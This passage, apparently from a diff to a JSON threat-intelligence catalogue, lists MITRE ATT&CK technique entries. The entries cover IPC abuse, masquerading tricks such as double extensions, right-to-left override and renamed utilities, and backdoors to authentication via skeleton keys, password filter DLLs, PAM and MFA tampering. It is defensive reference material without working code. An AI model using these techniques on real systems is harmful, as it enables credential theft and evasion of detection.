"MITRE", + "technique_attack_id": "T1559.003" + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "496998fe-4066-45cf-b84a-dc428e6819c8", + "value": "XPC Services" + }, + { + "description": "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. \n\nAdversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://app.tidalcyber.com/technique/82497cfd-725e-42f8-aaa7-4e20878a6a13) or [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66). Linux environments support several different IPC mechanisms, two of which being sockets and pipes.[[Linux IPC](https://app.tidalcyber.com/references/05293061-ce09-49b5-916a-bb7353acfdfa)] Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [Distributed Component Object Model](https://app.tidalcyber.com/technique/ebc5fabb-5634-49f2-8979-94ea98da114a) to facilitate remote IPC execution.[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + }, + { + "dest-uuid": "8bc683db-1311-476f-8cae-45f3f89dcc66", + "type": "similar" + }, + { + "dest-uuid": "82497cfd-725e-42f8-aaa7-4e20878a6a13", + "type": "similar" + }, + { + "dest-uuid": "496998fe-4066-45cf-b84a-dc428e6819c8", + "type": "similar" + } + ], + "uuid": "afa4e2b5-cdd8-4d54-bcdb-acee8b5649e4", + "value": "Inter-Process Communication" + }, + { + "description": "Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation.\n\nAdversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd) to connected network shares or with authenticated connections via [Remote Desktop Protocol](https://app.tidalcyber.com/technique/f5fb86b6-abf0-4d44-b4a0-56f0636c24d2).[[Unit42 LockerGoga 2019](https://app.tidalcyber.com/references/8f058923-f2f7-4c0e-b90a-c7a0d5e62186)]\n\nFiles can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://app.tidalcyber.com/software/062deac9-8f05-44e2-b347-96b59ba166ca). In some cases, adversaries may be able to leverage [Web Service](https://app.tidalcyber.com/technique/a729feee-8e21-444e-8eea-2ec595b09931)s such as Dropbox or OneDrive to copy files from one machine to another via shared, automatically synced folders.[[Dropbox Malware Sync](https://app.tidalcyber.com/references/06ca63fa-8c6c-501c-96d3-5e7e45ca1e04)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + } + ], + "uuid": "3dea57fc-3131-408b-a1fd-ff2eea1d858f", + "value": "Lateral Tool Transfer" + }, + { + "description": "Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://app.tidalcyber.com/technique/6736995e-b9ea-401b-81fa-6caeb7a17ce3)), security or vulnerable software ([Software Discovery](https://app.tidalcyber.com/technique/e9bff6ff-3142-4910-8f67-19b868912602)), or hosts within a compromised network ([Remote System Discovery](https://app.tidalcyber.com/technique/00a9a4d4-928d-4d95-be31-dfac6103991f)).\n\nHost binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) on Windows to access and/or export security event information.[[WithSecure Lazarus-NoPineapple Threat Intel Report 2023](https://app.tidalcyber.com/references/195922fa-a843-5cd3-a153-32f0b960dcb9)][[Cadet Blizzard emerges as novel threat actor](https://app.tidalcyber.com/references/7180c6a7-e6ea-54bf-bcd7-c5238bbc5f5b)] In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.[[SIM Swapping and Abuse of the Microsoft Azure Serial Console](https://app.tidalcyber.com/references/c596a0e0-6e9c-52e4-b1bb-9c0542f960f2)]\n\nAdversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.", + "meta": { + "platforms": [ + "IaaS", + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "309c7c8b-c366-5762-8611-136971ac4eb4", + "value": "Log Enumeration" + }, + { + "description": "An adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID). If endpoint protection software leverages the “parent-child\" relationship for detection, breaking this relationship could result in the adversary’s behavior not being associated with previous process tree activity. On Unix-based systems breaking this process tree is common practice for administrators to execute software using scripts and programs.[[3OHA double-fork 2022](https://app.tidalcyber.com/references/521b79fe-bb7b-52fd-a899-b73e254027a5)] \n\nOn Linux systems, adversaries may execute a series of [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) calls to alter malware's process tree. For example, adversaries can execute their payload without any arguments, call the `fork()` API call twice, then have the parent process exit. This creates a grandchild process with no parent process that is immediately adopted by the `init` system process (PID 1), which successfully disconnects the execution of the adversary's payload from its previous process tree.\n\nAnother example is using the “daemon” syscall to detach from the current parent process and run in the background.[[Sandfly BPFDoor 2022](https://app.tidalcyber.com/references/01c8337f-614b-5f63-870f-5c880b390922)][[Microsoft XorDdos Linux Stealth 2022](https://app.tidalcyber.com/references/6425d351-2c88-5af9-970a-4d0d184d0c70)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1036.009" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "ed511983-98ef-572f-b5fc-0687f48467e0", + "value": "Break Process Trees" + }, + { + "description": "Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: File.txt.exe may render in some views as just File.txt). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.[[PCMag DoubleExtension](https://app.tidalcyber.com/references/a729519d-8c9f-477c-b992-434076a9d294)][[SOCPrime DoubleExtension](https://app.tidalcyber.com/references/14a99228-de84-4551-a6b5-9c6f1173f292)] \n\nAdversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://app.tidalcyber.com/tactics/586a5b49-c566-4a57-beb4-e7c667f9c34c) into a user’s system via [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291) then [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). For example, an executable file attachment named Evil.txt.exe may display as Evil.txt to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.[[SOCPrime DoubleExtension](https://app.tidalcyber.com/references/14a99228-de84-4551-a6b5-9c6f1173f292)]\n\nCommon file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1036.007" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "7ae6fae6-b816-416d-8701-1cb471218fd5", + "value": "Double File Extension" + }, + { + "description": "Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.[[Threatexpress MetaTwin 2017](https://app.tidalcyber.com/references/156efefd-793f-4219-8904-ef160a45c9ec)]\n\nUnlike [Code Signing](https://app.tidalcyber.com/technique/9449c0d5-7445-45e0-9861-7aafd6531733), this activity will not result in a valid signature.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1036.001" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "aa5a31d0-1b78-481d-a317-5089c1e111bf", + "value": "Invalid Code Signature" + }, + { + "description": "Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file’s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file’s type. For example, the header of a JPEG file, is 0xFF 0xD8 and the file extension is either `.JPE`, `.JPEG` or `.JPG`. \n\nAdversaries may edit the header’s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)) and stored (e.g., [Upload Malware](https://app.tidalcyber.com/technique/8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe)) so that adversaries may move their malware without triggering detections. \n\nCommon non-executable file types and extensions, such as text files (`.txt`) and image files (`.jpg`, `.gif`, etc.) may be typically treated as benign. Based on this, adversaries may use a file extension to disguise malware, such as naming a PHP backdoor code with a file name of test.gif. A user may not know that a file is malicious due to the benign appearance and file extension.\n\nPolygot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malicious malware and capabilities.[[polygot_icedID](https://app.tidalcyber.com/references/dcd65d74-4e7b-5ddd-8c72-700456981347)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1036.008" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "f91a7433-d5f1-5a47-8252-f02b513ce7f4", + "value": "Masquerade File Type" + }, + { + "description": "Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.[[TechNet Schtasks](https://app.tidalcyber.com/references/17c03e27-222d-41b5-9fa2-34f0939e5371)][[Systemd Service Units](https://app.tidalcyber.com/references/43bae447-d2e3-4b53-b17b-12a0b54ac604)] Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.\n\nTasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)][[Fysbis Dr Web Analysis](https://app.tidalcyber.com/references/f1eb4818-fda6-46f2-9d5a-5469a5ed44fc)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1036.004" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "86c2f355-3c97-44c1-9a83-e3d016f50535", + "value": "Masquerade Task or Service" + }, + { + "description": "Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.\n\nAdversaries may also use the same icon of the file they are trying to mimic.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1036.005" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "442f60ed-5195-45c3-9d8c-7e17cabe7869", + "value": "Match Legitimate Name or Location" + }, + { + "description": "Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. [[LOLBAS Main Site](https://app.tidalcyber.com/references/615f6fa5-3059-49fc-9fa4-5ca0aeff4331)] It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). [[Elastic Masquerade Ball](https://app.tidalcyber.com/references/29c17b60-f947-4482-afa6-c80ca5819d10)] An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. [[F-Secure CozyDuke](https://app.tidalcyber.com/references/08e1d233-0580-484e-b737-af091e2aa9ea)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1036.003" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "14fa2a80-c838-462d-8c34-5a98a31a65ca", + "value": "Rename System Utilities" + }, + { + "description": "Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \\u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\\u202Egnp.js will be displayed as photo_high_resj.png.[[Infosecinstitute RTLO Technique](https://app.tidalcyber.com/references/79d21506-07a8-444d-a2d7-c91de67c393e)]\n\nAdversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291)/[Malicious File](https://app.tidalcyber.com/technique/3412ca73-2f25-452a-8e6e-5c28fe72ef78) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.[[Trend Micro PLEAD RTLO](https://app.tidalcyber.com/references/9a052eba-1708-44c9-a20f-8b4ef208fa14)][[Kaspersky RTLO Cyber Crime](https://app.tidalcyber.com/references/38fbd993-de98-49e9-8437-bc6a1493d6ed)] RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1036.002" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "495604b5-f74f-4224-9c3c-f8aacf8aef51", + "value": "Right-to-Left Override" + }, + { + "description": "Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.\n\nFor example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to evil.txt (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed [[Mac Backdoors are back](https://app.tidalcyber.com/references/c37f00dc-ee53-4be1-9046-0a28bdc5649a)].\n\nAdversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1036.006" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "50dd9303-b6a5-417a-860e-26f4244ff580", + "value": "Space after Filename" + }, + { + "description": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\n\nRenaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd).[[LOLBAS Main Site](https://app.tidalcyber.com/references/615f6fa5-3059-49fc-9fa4-5ca0aeff4331)] Masquerading may also include the use of [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections.", + "meta": { + "platforms": [ + "Containers", + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "ed511983-98ef-572f-b5fc-0687f48467e0", + "type": "similar" + }, + { + "dest-uuid": "7ae6fae6-b816-416d-8701-1cb471218fd5", + "type": "similar" + }, + { + "dest-uuid": "aa5a31d0-1b78-481d-a317-5089c1e111bf", + "type": "similar" + }, + { + "dest-uuid": "f91a7433-d5f1-5a47-8252-f02b513ce7f4", + "type": "similar" + }, + { + "dest-uuid": "86c2f355-3c97-44c1-9a83-e3d016f50535", + "type": "similar" + }, + { + "dest-uuid": "442f60ed-5195-45c3-9d8c-7e17cabe7869", + "type": "similar" + }, + { + "dest-uuid": "14fa2a80-c838-462d-8c34-5a98a31a65ca", + "type": "similar" + }, + { + "dest-uuid": "495604b5-f74f-4224-9c3c-f8aacf8aef51", + "type": "similar" + }, + { + "dest-uuid": "50dd9303-b6a5-417a-860e-26f4244ff580", + "type": "similar" + } + ], + "uuid": "a0adacc1-8d2a-4e0b-92c1-3766264df4fd", + "value": "Masquerading" + }, + { + "description": "Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. \n\nMalware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: [Skeleton Key](https://app.tidalcyber.com/software/206453a4-a298-4cab-9fdf-f136a4e0c761)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.[[Dell Skeleton](https://app.tidalcyber.com/references/cea9ce77-7641-4086-b92f-a4c3ad94a49c)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1556.001" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "82d15799-9776-463e-9b87-a58d682cee55", + "value": "Domain Controller Authentication" + }, + { + "description": "Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts. \n\nMany organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Azure AD includes three options for synchronizing identities between Active Directory and Azure AD[[Azure AD Hybrid Identity](https://app.tidalcyber.com/references/b019406c-6e39-41a2-a8b4-97f8d6482147)]:\n\n* Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Azure AD, allowing authentication to Azure AD to take place entirely in the cloud \n* Pass Through Authentication (PTA), in which Azure AD authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory \n* Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Azure AD \n\nAD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges. \n\nBy modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` process that authorizes all attempts to authenticate to Azure AD, as well as records user credentials.[[Azure AD Connect for Read Teamers](https://app.tidalcyber.com/references/0b9946ff-8c1c-4d93-8401-e1e4dd186305)][[AADInternals Azure AD On-Prem to Cloud](https://app.tidalcyber.com/references/7a6a7ecd-b9c7-4371-9924-34733597556c)] In environments using AD FS, an adversary may edit the `Microsoft.IdentityServer.Servicehost` configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.[[MagicWeb](https://app.tidalcyber.com/references/5b728693-37e8-4100-ac82-b70945113e07)]\n\nIn some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Azure AD tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Azure AD environment as any user.[[Mandiant Azure AD Backdoors](https://app.tidalcyber.com/references/7b4502ff-a45c-4ba7-b00e-ca9f6e9c2ac8)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1556.007" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "b0a1ef13-0c54-47e8-a220-7543ba41a327", + "value": "Hybrid Identity" + }, + { + "description": "Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce adversaries have gained access to a network by either compromising an account lacking MFA or by employing an MFA bypass method such as [Multi-Factor Authentication Request Generation](https://app.tidalcyber.com/technique/c0f2efd4-bfc8-43da-9859-14446fb8f289), adversaries may leverage their access to modify or completely disable MFA defenses. This can be accomplished by abusing legitimate features, such as excluding users from Azure AD Conditional Access Policies, registering a new yet vulnerable/adversary-controlled MFA method, or by manually patching MFA programs and configuration files to bypass expected functionality.[[Mandiant APT42](https://app.tidalcyber.com/references/10b3e476-a0c5-41fd-8cb8-5bfb245b118f)][[Azure AD Conditional Access Exclusions](https://app.tidalcyber.com/references/8cfb45ec-b660-4a3a-9175-af4ea01ef473)]\n\nFor example, modifying the Windows hosts file (`C:\\windows\\system32\\drivers\\etc\\hosts`) to redirect MFA calls to localhost instead of an MFA server may cause the MFA process to fail. If a \"fail open\" policy is in place, any otherwise successful authentication attempt may be granted access without enforcing MFA. [[Russians Exploit Default MFA Protocol - CISA March 2022](https://app.tidalcyber.com/references/00c6ff88-6eeb-486d-ae69-dffd5aebafe6)] \n\nDepending on the scope, goals, and privileges of the adversary, MFA defenses may be disabled for individual accounts or for all accounts tied to a larger group, such as all domain accounts in a victim's network environment.[[Russians Exploit Default MFA Protocol - CISA March 2022](https://app.tidalcyber.com/references/00c6ff88-6eeb-486d-ae69-dffd5aebafe6)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1556.006" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "60498bb5-fcfb-4d85-bf3e-26c30c08fbda", + "value": "Multi-Factor Authentication" + }, + { + "description": "Adversaries may use [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.\n\n[Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.[[Mandiant - Synful Knock](https://app.tidalcyber.com/references/1f6eaa98-9184-4341-8634-5512a9c632dd)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1556.004" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "195aa08b-15fd-4019-b905-8f31bc5e2094", + "value": "Network Device Authentication" + }, + { + "description": "Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.[[Network Provider API](https://app.tidalcyber.com/references/b218434e-4233-5963-824e-50ee32d468ed)] During the logon process, Winlogon (the interactive logon module) sends credentials to the local `mpnotify.exe` process via RPC. The `mpnotify.exe` process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening.[[NPPSPY - Huntress](https://app.tidalcyber.com/references/df1f7379-38c3-5ca9-8333-d684022c000c)][[NPPSPY Video](https://app.tidalcyber.com/references/6533d5df-7388-5c59-8c63-0923de34b61d)][[NPLogonNotify](https://app.tidalcyber.com/references/1fda833e-e543-5e68-a0f5-8a4170dd632a)] \n\nAdversaries can configure a malicious network provider DLL to receive credentials from `mpnotify.exe`.[[NPPSPY](https://app.tidalcyber.com/references/c12bfaf6-4d83-552e-912b-cc55bce85961)] Once installed as a credential manager (via the Registry), a malicious DLL can receive and save credentials each time a user logs onto a Windows workstation or domain via the `NPLogonNotify()` function.[[NPLogonNotify](https://app.tidalcyber.com/references/1fda833e-e543-5e68-a0f5-8a4170dd632a)]\n\nAdversaries may target planting malicious network provider DLLs on systems known to have increased logon activity and/or administrator logon activity, such as servers and domain controllers.[[NPPSPY - Huntress](https://app.tidalcyber.com/references/df1f7379-38c3-5ca9-8333-d684022c000c)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1556.008" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "f1329084-6e9c-5933-83cd-56c1bf8439e3", + "value": "Network Provider DLL" + }, + { + "description": "Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. \n\nWindows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. \n\nAdversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.[[Carnal Ownage Password Filters Sept 2013](https://app.tidalcyber.com/references/78ed9074-a46c-4ce6-ab7d-a587bd585dc5)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1556.002" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "cd65b0f4-a2a4-4291-aff2-1c65cf68cf6c", + "value": "Password Filter DLL" + }, + { + "description": "Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.[[Apple PAM](https://app.tidalcyber.com/references/4838a58e-c00d-4b4c-937d-8da5d9f1a4b5)][[Man Pam_Unix](https://app.tidalcyber.com/references/6bc5ad93-3cc2-4429-ac4c-aae72193df27)][[Red Hat PAM](https://app.tidalcyber.com/references/3dc88605-64c8-495a-9e3b-e5686fd2eb03)]\n\nAdversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.[[PAM Backdoor](https://app.tidalcyber.com/references/da1ffaf1-39f9-4516-8c04-4a4301e13585)]\n\nMalicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.[[PAM Creds](https://app.tidalcyber.com/references/aa9d5bdd-2102-4322-8736-56db8e083fc0)][[Apple PAM](https://app.tidalcyber.com/references/4838a58e-c00d-4b4c-937d-8da5d9f1a4b5)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1556.003" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": 